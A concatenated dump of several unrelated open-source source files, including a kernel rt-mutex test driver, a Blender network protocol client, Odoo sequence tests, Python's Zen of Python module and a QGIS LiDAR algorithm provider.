# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <tglx@linutronix.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"lockbkl" : "9",
"unlockbkl" : "10",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Seperate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
| gpl-2.0 |
xbuf/blender_io_xbuf | protocol.py | 1 | 4603 | # This file is part of blender_io_xbuf. blender_io_xbuf is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright David Bernard
# <pep8 compliant>
import struct
import asyncio
import atexit
import xbuf
import xbuf.datas_pb2
import xbuf.cmds_pb2
from . import xbuf_export # pylint: disable=W0406
# TODO better management off the event loop (eg on unregister)
loop = asyncio.get_event_loop()
atexit.register(loop.close)
class Kind:
pingpong = 0x01
logs = 0x02
ask_screenshot = 0x03
raw_screenshot = 0x04
msgpack = 0x05
xbuf_cmd = 0x06
class Client:
def __init__(self):
self.writer = None
self.reader = None
self.host = None
self.port = None
def __del__(self):
self.close()
def close(self):
if self.writer is not None:
print('Close the socket/writer')
self.writer.write_eof()
self.writer.close()
self.writer = None
self.reader = None
@asyncio.coroutine
def connect(self, host, port):
if (host != self.host) or (port != self.port):
self.close()
if self.writer is None:
self.host = host
self.port = port
(self.reader, self.writer) = yield from asyncio.open_connection(host, port, loop=loop)
return self
@asyncio.coroutine
def readHeader(reader):
"""return (size, kind)"""
header = yield from reader.readexactly(5)
return struct.unpack('>iB', header)
@asyncio.coroutine
def readMessage(reader):
"""return (kind, raw_message)"""
(size, kind) = yield from readHeader(reader)
# kind = header[4]
raw = yield from reader.readexactly(size)
return (kind, raw)
def writeMessage(writer, kind, body):
writer.write((len(body)).to_bytes(4, byteorder='big'))
writer.write((kind).to_bytes(1, byteorder='big'))
writer.write(body)
def askScreenshot(writer, width, height):
b = bytearray()
b.extend((width).to_bytes(4, byteorder='big'))
b.extend((height).to_bytes(4, byteorder='big'))
writeMessage(writer, Kind.ask_screenshot, b)
def setEye(writer, location, rotation, projection_matrix, near, far, is_ortho):
# sendCmd(writer, 'updateCamera', (_encode_vec3(location), _encode_quat(rotation), _encode_mat4(projection_matrix)))
cmd = xbuf.cmds_pb2.Cmd()
# cmd.setCamera = xbuf.cmds_pb2.SetCamera()
xbuf_export.cnv_translation(location, cmd.setEye.location)
xbuf_export.cnv_quatZupToYup(rotation, cmd.setEye.rotation)
xbuf_export.cnv_mat4(projection_matrix, cmd.setEye.projection)
cmd.setEye.near = near
cmd.setEye.far = far
cmd.setEye.projMode = xbuf.cmds_pb2.SetEye.orthographic if is_ortho else xbuf.cmds_pb2.SetEye.perspective
writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def setData(writer, scene, cfg):
cmd = xbuf.cmds_pb2.Cmd()
xbuf_export.export(scene, cmd.setData, cfg)
send = (len(cmd.setData.relations) > 0 or
len(cmd.setData.tobjects) > 0 or
len(cmd.setData.geometries) > 0 or
len(cmd.setData.materials) > 0 or
len(cmd.setData.lights) > 0
)
if send:
# print("send setData")
writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def changeAssetFolders(writer, cfg):
cmd = xbuf.cmds_pb2.Cmd()
cmd.changeAssetFolders.path.append(cfg.assets_path)
cmd.changeAssetFolders.register = True
cmd.changeAssetFolders.unregisterOther = True
writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def playAnimation(writer, ref, anims):
cmd = xbuf.cmds_pb2.Cmd()
cmd.playAnimation.ref = ref
cmd.playAnimation.animationsNames.extend(anims)
writeMessage(writer, Kind.xbuf_cmd, cmd.SerializeToString())
def run_until_complete(f, *args, **kwargs):
if asyncio.iscoroutine(f):
loop.run_until_complete(f)
else:
coro = asyncio.coroutine(f)
future = coro(*args, **kwargs)
loop.run_until_complete(future)
| gpl-3.0 |
luogangyi/bcec-nova | nova/ipv6/api.py | 40 | 1275 | # Copyright (c) 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova import utils
ipv6_backend_opt = cfg.StrOpt('ipv6_backend',
default='rfc2462',
help='Backend to use for IPv6 generation')
CONF = cfg.CONF
CONF.register_opt(ipv6_backend_opt)
IMPL = None
def reset_backend():
global IMPL
IMPL = utils.LazyPluggable('ipv6_backend',
rfc2462='nova.ipv6.rfc2462',
account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
return IMPL.to_mac(ipv6_address)
reset_backend()
| apache-2.0 |
QinerTech/QinerApps | openerp/addons/base/tests/test_ir_sequence.py | 40 | 8375 | # -*- coding: utf-8 -*-
# Run with one of these commands:
# > OPENERP_ADDONS_PATH='../../addons/trunk' OPENERP_PORT=8069 \
# OPENERP_DATABASE=yy PYTHONPATH=. python tests/test_ir_sequence.py
# > OPENERP_ADDONS_PATH='../../addons/trunk' OPENERP_PORT=8069 \
# OPENERP_DATABASE=yy nosetests tests/test_ir_sequence.py
# > OPENERP_ADDONS_PATH='../../../addons/trunk' OPENERP_PORT=8069 \
# OPENERP_DATABASE=yy PYTHONPATH=../:. unit2 test_ir_sequence
# This assume an existing database.
import psycopg2
import psycopg2.errorcodes
import unittest
import openerp
from openerp.tests import common
ADMIN_USER_ID = common.ADMIN_USER_ID
def registry(model):
return openerp.modules.registry.RegistryManager.get(common.get_db_name())[model]
def cursor():
return openerp.modules.registry.RegistryManager.get(common.get_db_name()).cursor()
def drop_sequence(code):
cr = cursor()
s = registry('ir.sequence')
ids = s.search(cr, ADMIN_USER_ID, [('code', '=', code)])
s.unlink(cr, ADMIN_USER_ID, ids)
cr.commit()
cr.close()
class test_ir_sequence_standard(unittest.TestCase):
""" A few tests for a 'Standard' (i.e. PostgreSQL) sequence. """
def test_ir_sequence_create(self):
""" Try to create a sequence object. """
cr = cursor()
d = dict(code='test_sequence_type', name='Test sequence')
c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
assert c
cr.commit()
cr.close()
def test_ir_sequence_search(self):
""" Try a search. """
cr = cursor()
ids = registry('ir.sequence').search(cr, ADMIN_USER_ID, [], {})
assert ids
cr.commit()
cr.close()
def test_ir_sequence_draw(self):
""" Try to draw a number. """
cr = cursor()
n = registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type', {})
assert n
cr.commit()
cr.close()
def test_ir_sequence_draw_twice(self):
""" Try to draw a number from two transactions. """
cr0 = cursor()
cr1 = cursor()
n0 = registry('ir.sequence').next_by_code(cr0, ADMIN_USER_ID, 'test_sequence_type', {})
assert n0
n1 = registry('ir.sequence').next_by_code(cr1, ADMIN_USER_ID, 'test_sequence_type', {})
assert n1
cr0.commit()
cr1.commit()
cr0.close()
cr1.close()
@classmethod
def tearDownClass(cls):
drop_sequence('test_sequence_type')
class test_ir_sequence_no_gap(unittest.TestCase):
""" Copy of the previous tests for a 'No gap' sequence. """
def test_ir_sequence_create_no_gap(self):
""" Try to create a sequence object. """
cr = cursor()
d = dict(code='test_sequence_type_2', name='Test sequence',
implementation='no_gap')
c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
assert c
cr.commit()
cr.close()
def test_ir_sequence_draw_no_gap(self):
""" Try to draw a number. """
cr = cursor()
n = registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type_2', {})
assert n
cr.commit()
cr.close()
def test_ir_sequence_draw_twice_no_gap(self):
""" Try to draw a number from two transactions.
This is expected to not work.
"""
cr0 = cursor()
cr1 = cursor()
cr1._default_log_exceptions = False # Prevent logging a traceback
with self.assertRaises(psycopg2.OperationalError) as e:
n0 = registry('ir.sequence').next_by_code(cr0, ADMIN_USER_ID, 'test_sequence_type_2', {})
assert n0
n1 = registry('ir.sequence').next_by_code(cr1, ADMIN_USER_ID, 'test_sequence_type_2', {})
self.assertEqual(e.exception.pgcode, psycopg2.errorcodes.LOCK_NOT_AVAILABLE, msg="postgresql returned an incorrect errcode")
cr0.close()
cr1.close()
@classmethod
def tearDownClass(cls):
drop_sequence('test_sequence_type_2')
class test_ir_sequence_change_implementation(unittest.TestCase):
""" Create sequence objects and change their ``implementation`` field. """
def test_ir_sequence_1_create(self):
""" Try to create a sequence object. """
cr = cursor()
d = dict(code='test_sequence_type_3', name='Test sequence')
c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
assert c
d = dict(code='test_sequence_type_4', name='Test sequence',
implementation='no_gap')
c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
assert c
cr.commit()
cr.close()
def test_ir_sequence_2_write(self):
cr = cursor()
ids = registry('ir.sequence').search(cr, ADMIN_USER_ID,
[('code', 'in', ['test_sequence_type_3', 'test_sequence_type_4'])], {})
registry('ir.sequence').write(cr, ADMIN_USER_ID, ids,
{'implementation': 'standard'}, {})
registry('ir.sequence').write(cr, ADMIN_USER_ID, ids,
{'implementation': 'no_gap'}, {})
cr.commit()
cr.close()
def test_ir_sequence_3_unlink(self):
cr = cursor()
ids = registry('ir.sequence').search(cr, ADMIN_USER_ID,
[('code', 'in', ['test_sequence_type_3', 'test_sequence_type_4'])], {})
registry('ir.sequence').unlink(cr, ADMIN_USER_ID, ids, {})
cr.commit()
cr.close()
@classmethod
def tearDownClass(cls):
drop_sequence('test_sequence_type_3')
drop_sequence('test_sequence_type_4')
class test_ir_sequence_generate(unittest.TestCase):
""" Create sequence objects and generate some values. """
def test_ir_sequence_create(self):
""" Try to create a sequence object. """
cr = cursor()
d = dict(code='test_sequence_type_5', name='Test sequence')
c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
assert c
cr.commit()
cr.close()
cr = cursor()
f = lambda *a: registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type_5', {})
assert all(str(x) == f() for x in xrange(1,10))
cr.commit()
cr.close()
def test_ir_sequence_create_no_gap(self):
""" Try to create a sequence object. """
cr = cursor()
d = dict(code='test_sequence_type_6', name='Test sequence', implementation='no_gap')
c = registry('ir.sequence').create(cr, ADMIN_USER_ID, d, {})
assert c
cr.commit()
cr.close()
cr = cursor()
f = lambda *a: registry('ir.sequence').next_by_code(cr, ADMIN_USER_ID, 'test_sequence_type_6', {})
assert all(str(x) == f() for x in xrange(1,10))
cr.commit()
cr.close()
@classmethod
def tearDownClass(cls):
drop_sequence('test_sequence_type_5')
drop_sequence('test_sequence_type_6')
class Test_ir_sequence_init(common.TransactionCase):
def test_00(self):
registry, cr, uid = self.registry, self.cr, self.uid
# test if read statement return the good number_next value (from postgreSQL sequence and not ir_sequence value)
sequence = registry('ir.sequence')
# first creation of sequence (normal)
values = {'number_next': 1,
'company_id': 1,
'padding': 4,
'number_increment': 1,
'implementation': 'standard',
'name': 'test-sequence-00'}
seq_id = sequence.create(cr, uid, values)
# Call get next 4 times
sequence.next_by_id(cr, uid, seq_id)
sequence.next_by_id(cr, uid, seq_id)
sequence.next_by_id(cr, uid, seq_id)
read_sequence = sequence.next_by_id(cr, uid, seq_id)
# Read the value of the current sequence
assert read_sequence == "0004", 'The actual sequence value must be 4. reading : %s' % read_sequence
# reset sequence to 1 by write method calling
sequence.write(cr, uid, [seq_id], {'number_next': 1})
# Read the value of the current sequence
read_sequence = sequence.next_by_id(cr, uid, seq_id)
assert read_sequence == "0001", 'The actual sequence value must be 1. reading : %s' % read_sequence
if __name__ == "__main__":
unittest.main()
| gpl-3.0 |
nattee/cafe-grader-web | lib/assets/Lib/this.py | 18 | 1031 | s = """Gur Mra bs Clguba, ol Gvz Crgref
Ornhgvshy vf orggre guna htyl.
Rkcyvpvg vf orggre guna vzcyvpvg.
Fvzcyr vf orggre guna pbzcyrk.
Pbzcyrk vf orggre guna pbzcyvpngrq.
Syng vf orggre guna arfgrq.
Fcnefr vf orggre guna qrafr.
Ernqnovyvgl pbhagf.
Fcrpvny pnfrf nera'g fcrpvny rabhtu gb oernx gur ehyrf.
Nygubhtu cenpgvpnyvgl orngf chevgl.
Reebef fubhyq arire cnff fvyragyl.
Hayrff rkcyvpvgyl fvyraprq.
Va gur snpr bs nzovthvgl, ershfr gur grzcgngvba gb thrff.
Gurer fubhyq or bar-- naq cersrenoyl bayl bar --boivbhf jnl gb qb vg.
Nygubhtu gung jnl znl abg or boivbhf ng svefg hayrff lbh'er Qhgpu.
Abj vf orggre guna arire.
Nygubhtu arire vf bsgra orggre guna *evtug* abj.
Vs gur vzcyrzragngvba vf uneq gb rkcynva, vg'f n onq vqrn.
Vs gur vzcyrzragngvba vf rnfl gb rkcynva, vg znl or n tbbq vqrn.
Anzrfcnprf ner bar ubaxvat terng vqrn -- yrg'f qb zber bs gubfr!"""
d = {}
for c in (65, 97):
for i in range(26):
d[chr(i+c)] = chr((i+13) % 26 + c)
print("".join([d.get(c, c) for c in s]))
| mit |
siliconsmiley/QGIS | python/plugins/processing/algs/lidar/LidarToolsAlgorithmProvider.py | 4 | 9955 | # -*- coding: utf-8 -*-
"""
***************************************************************************
LidarToolsAlgorithmProvider.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
---------------------
Date : April, October 2014
Copyright : (C) 2014 by Martin Isenburg
Email : martin near rapidlasso point com
---------------------
Date : June 2014
Copyright : (C) 2014 by Agresta S. Coop
Email : iescamochero at agresta dot org
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import QIcon
from processing.core.AlgorithmProvider import AlgorithmProvider
from processing.core.ProcessingConfig import ProcessingConfig, Setting
from processing.tools.system import isWindows
from lastools.LAStoolsUtils import LAStoolsUtils
from lastools.lasground import lasground
from lastools.lasheight import lasheight
from lastools.lasclassify import lasclassify
from lastools.laszip import laszip
from lastools.lasindex import lasindex
from lastools.lasclip import lasclip
from lastools.lasquery import lasquery
from lastools.lascolor import lascolor
from lastools.lasthin import lasthin
from lastools.lasnoise import lasnoise
from lastools.lassort import lassort
from lastools.lastile import lastile
from lastools.lasgrid import lasgrid
from lastools.lasview import lasview
from lastools.lasboundary import lasboundary
from lastools.lasinfo import lasinfo
from lastools.las2dem import las2dem
from lastools.blast2dem import blast2dem
from lastools.las2iso import las2iso
from lastools.las2tin import las2tin
from lastools.las2las_filter import las2las_filter
from lastools.las2las_project import las2las_project
from lastools.las2las_transform import las2las_transform
from lastools.blast2iso import blast2iso
from lastools.lasprecision import lasprecision
from lastools.lasvalidate import lasvalidate
from lastools.lasduplicate import lasduplicate
from lastools.las2txt import las2txt
from lastools.txt2las import txt2las
from lastools.las2shp import las2shp
from lastools.shp2las import shp2las
from lastools.lasmerge import lasmerge
from lastools.lassplit import lassplit
from lastools.lascanopy import lascanopy
from lastools.lasoverage import lasoverage
from lastools.lasoverlap import lasoverlap
from lastools.lastilePro import lastilePro
from lastools.lasgroundPro import lasgroundPro
from lastools.las2demPro import las2demPro
from lastools.lasheightPro import lasheightPro
from lastools.laszipPro import laszipPro
from lastools.lasgridPro import lasgridPro
from lastools.lasduplicatePro import lasduplicatePro
from lastools.lassortPro import lassortPro
from lastools.lasclassifyPro import lasclassifyPro
from lastools.lasthinPro import lasthinPro
from lastools.lasnoisePro import lasnoisePro
from lastools.lasindexPro import lasindexPro
from lastools.lascanopyPro import lascanopyPro
from lastools.blast2demPro import blast2demPro
from lastools.lasboundaryPro import lasboundaryPro
from lastools.lasinfoPro import lasinfoPro
from lastools.las2lasPro_filter import las2lasPro_filter
from lastools.las2lasPro_project import las2lasPro_project
from lastools.las2lasPro_transform import las2lasPro_transform
from lastools.lasoveragePro import lasoveragePro
from lastools.txt2lasPro import txt2lasPro
from lastools.las2txtPro import las2txtPro
from lastools.blast2isoPro import blast2isoPro
from lastools.lasvalidatePro import lasvalidatePro
from lastools.lasmergePro import lasmergePro
from lastools.lasviewPro import lasviewPro
from lastools.lasoverlapPro import lasoverlapPro
from lastools.flightlinesToDTMandDSM import flightlinesToDTMandDSM
from lastools.flightlinesToCHM import flightlinesToCHM
from lastools.flightlinesToSingleCHMpitFree import flightlinesToSingleCHMpitFree
from lastools.hugeFileClassify import hugeFileClassify
from lastools.hugeFileGroundClassify import hugeFileGroundClassify
from lastools.hugeFileNormalize import hugeFileNormalize
from fusion.OpenViewerAction import OpenViewerAction
from fusion.CanopyMaxima import CanopyMaxima
from fusion.CanopyModel import CanopyModel
from fusion.Catalog import Catalog
from fusion.ClipData import ClipData
from fusion.CloudMetrics import CloudMetrics
from fusion.Cover import Cover
from fusion.GridMetrics import GridMetrics
from fusion.GridSurfaceCreate import GridSurfaceCreate
from fusion.TinSurfaceCreate import TinSurfaceCreate
from fusion.Csv2Grid import Csv2Grid
from fusion.GroundFilter import GroundFilter
from fusion.MergeData import MergeData
from fusion.FilterData import FilterData
from fusion.FusionUtils import FusionUtils
class LidarToolsAlgorithmProvider(AlgorithmProvider):
def __init__(self):
AlgorithmProvider.__init__(self)
self.activate = False
self.algsList = []
# LAStools for processing single files
if (isWindows() or LAStoolsUtils.hasWine()):
lastools = [
lasground(), lasheight(), lasclassify(), lasclip(), lastile(),
lascolor(), lasgrid(), las2dem(), blast2dem(), las2iso(), blast2iso(),
lasview(), lasboundary(), lasinfo(), lasprecision(), las2tin(),
lasvalidate(), lasduplicate(), las2txt(), txt2las(), laszip(),
lasindex(), lasthin(), lassort(), lascanopy(), lasmerge(),
las2shp(), shp2las(), lasnoise(), lassplit(), las2las_filter(),
las2las_project(), las2las_transform(), lasoverage(), lasoverlap(),
lasquery()
]
else:
lastools = [
lasinfo(), lasprecision(), lasvalidate(), las2txt(), txt2las(),
laszip(), lasindex(), lasmerge(), las2las_filter(), las2las_project(),
las2las_transform(), lasquery()
]
for alg in lastools:
alg.group = 'LAStools'
self.algsList.extend(lastools)
# LAStools Production for processing folders of files
if (isWindows() or LAStoolsUtils.hasWine()):
lastoolsPro = [
lastilePro(), lasgroundPro(), las2demPro(), lasheightPro(), laszipPro(),
lasduplicatePro(), lasgridPro(), lassortPro(), lasclassifyPro(), lasthinPro(),
lasnoisePro(), lasindexPro(), lascanopyPro(), blast2demPro(), lasboundaryPro(),
lasinfoPro(), las2lasPro_filter(), las2lasPro_project(), las2lasPro_transform(),
lasoveragePro(), txt2lasPro(), las2txtPro(), blast2isoPro(), lasvalidatePro(),
lasmergePro(), lasviewPro(), lasoverlapPro()
]
else:
lastoolsPro = [
laszipPro(), lasindexPro(), lasinfoPro(), las2lasPro_filter(), las2lasPro_project(),
las2lasPro_transform(), txt2lasPro(), las2txtPro(), lasvalidatePro(), lasmergePro()
]
for alg in lastoolsPro:
alg.group = 'LAStools Production'
self.algsList.extend(lastoolsPro)
# some examples for LAStools Pipelines
if (isWindows() or LAStoolsUtils.hasWine()):
lastoolsPipe = [
flightlinesToDTMandDSM(), flightlinesToCHM(), flightlinesToSingleCHMpitFree(), hugeFileClassify(),
hugeFileGroundClassify(), hugeFileNormalize()
]
else:
lastoolsPipe = [ ]
for alg in lastoolsPipe:
alg.group = 'LAStools Pipelines'
self.algsList.extend(lastoolsPipe)
# FUSION
if isWindows():
self.actions.append(OpenViewerAction())
fusiontools = [
Catalog(), CloudMetrics(), CanopyMaxima(), CanopyModel(), ClipData(),
Csv2Grid(), Cover(), FilterData(), GridMetrics(), GroundFilter(),
GridSurfaceCreate(), MergeData(), TinSurfaceCreate()
]
for alg in fusiontools:
alg.group = 'Fusion'
self.algsList.extend(fusiontools)
def initializeSettings(self):
AlgorithmProvider.initializeSettings(self)
ProcessingConfig.addSetting(Setting(
self.getDescription(),
LAStoolsUtils.LASTOOLS_FOLDER,
self.tr('LAStools folder'), LAStoolsUtils.LAStoolsPath(),
valuetype=Setting.FOLDER))
ProcessingConfig.addSetting(Setting(
self.getDescription(),
FusionUtils.FUSION_FOLDER,
self.tr('Fusion folder'), FusionUtils.FusionPath(),
valuetype=Setting.FOLDER))
ProcessingConfig.addSetting(Setting(
self.getDescription(),
LAStoolsUtils.WINE_FOLDER,
self.tr('Wine folder'), '', valuetype=Setting.FOLDER))
def getName(self):
return 'lidartools'
def getDescription(self):
return self.tr('Tools for LiDAR data')
def getIcon(self):
return QIcon(os.path.dirname(__file__) + '/../../images/tool.png')
def _loadAlgorithms(self):
self.algs = self.algsList
def getSupportedOutputTableExtensions(self):
return ['csv']
| gpl-2.0 |
biswajitsahu/kuma | vendor/packages/translate/tools/porestructure.py | 24 | 5556 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2005, 2006 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""Restructure Gettxt PO files produced by
:doc:`poconflicts </commands/poconflicts>` into the original directory tree
for merging using :doc:`pomerge </commands/pomerge>`.
See: http://docs.translatehouse.org/projects/translate-toolkit/en/latest/commands/pomerge.html
for examples and usage instructions.
"""
import os
import sys
from translate.misc import optrecurse
from translate.storage import po
class SplitOptionParser(optrecurse.RecursiveOptionParser):
"""a specialized Option Parser for posplit"""
def parse_args(self, args=None, values=None):
"""parses the command line options, handling implicit input/output args"""
(options, args) = optrecurse.RecursiveOptionParser.parse_args(self, args, values)
if not options.output:
self.error("Output file is rquired")
return (options, args)
def set_usage(self, usage=None):
"""sets the usage string - if usage not given, uses getusagestring for each option"""
if usage is None:
self.usage = "%prog " + " ".join([self.getusagestring(option) for option in self.option_list]) + \
"\n " + \
"input directory is searched for PO files with (poconflicts) comments, all entries are written to files in a directory structure for pomerge"
else:
super(SplitOptionParser, self).set_usage(usage)
def recursiveprocess(self, options):
"""recurse through directories and process files"""
if not self.isrecursive(options.output, 'output'):
try:
self.warning("Output directory does not exist. Attempting to create")
# TODO: maybe we should only allow it to be created, otherwise
# we mess up an existing tree.
os.mkdir(options.output)
except:
self.error(optrecurse.optparse.OptionValueError("Output directory does not exist, attempt to create failed"))
if self.isrecursive(options.input, 'input') and getattr(options, "allowrecursiveinput", True):
if isinstance(options.input, list):
inputfiles = self.recurseinputfilelist(options)
else:
inputfiles = self.recurseinputfiles(options)
else:
if options.input:
inputfiles = [os.path.basename(options.input)]
options.input = os.path.dirname(options.input)
else:
inputfiles = [options.input]
self.textmap = {}
self.initprogressbar(inputfiles, options)
for inputpath in inputfiles:
fullinputpath = self.getfullinputpath(options, inputpath)
try:
success = self.processfile(options, fullinputpath)
except Exception as error:
if isinstance(error, KeyboardInterrupt):
raise self.warning("Error processing: input %s" % (fullinputpath), options, sys.exc_info())
success = False
self.reportprogress(inputpath, success)
del self.progressbar
def processfile(self, options, fullinputpath):
"""process an individual file"""
inputfile = self.openinputfile(options, fullinputpath)
inputpofile = po.pofile(inputfile)
for pounit in inputpofile.units:
if not (pounit.isheader() or pounit.hasplural()): # XXX
if pounit.hasmarkedcomment("poconflicts"):
for comment in pounit.othercomments:
if comment.find("# (poconflicts)") == 0:
pounit.othercomments.remove(comment)
break
# TODO: refactor writing out
outputpath = comment[comment.find(")") + 2:].strip()
self.checkoutputsubdir(options, os.path.dirname(outputpath))
fulloutputpath = os.path.join(options.output, outputpath)
if os.path.isfile(fulloutputpath):
outputfile = open(fulloutputpath, 'r')
outputpofile = po.pofile(outputfile)
else:
outputpofile = po.pofile()
outputpofile.units.append(pounit) # TODO:perhaps check to see if it's already there...
outputfile = open(fulloutputpath, 'w')
outputfile.write(str(outputpofile))
def main():
# outputfile extentions will actually be determined by the comments in the
# po files
pooutput = ("po", None)
formats = {(None, None): pooutput, ("po", "po"): pooutput, "po": pooutput}
parser = SplitOptionParser(formats, description=__doc__)
parser.set_usage()
parser.run()
if __name__ == '__main__':
main()
| mpl-2.0 |
acetcom/nextepc | lib/nas/eps/support/cache/nas-msg-214.py | 2 | 1879 | ies = []
ies.append({ "iei" : "", "value" : "EPS bearer identity for packet filter", "type" : "Linked EPS bearer identity", "reference" : "9.9.4.6", "presence" : "M", "format" : "V", "length" : "1/2"})
ies.append({ "iei" : "", "value" : "Traffic flow aggregate", "type" : "Traffic flow aggregate description", "reference" : "9.9.4.15", "presence" : "M", "format" : "LV", "length" : "2-256"})
ies.append({ "iei" : "5B", "value" : "Required traffic flow QoS", "type" : "EPS quality of service", "reference" : "9.9.4.3", "presence" : "O", "format" : "TLV", "length" : "3-15"})
ies.append({ "iei" : "58", "value" : "ESM cause", "type" : "ESM cause", "reference" : "9.9.4.4", "presence" : "O", "format" : "TV", "length" : "2"})
ies.append({ "iei" : "27", "value" : "Protocol configuration options", "type" : "Protocol configuration options", "reference" : "9.9.4.11", "presence" : "O", "format" : "TLV", "length" : "3-253"})
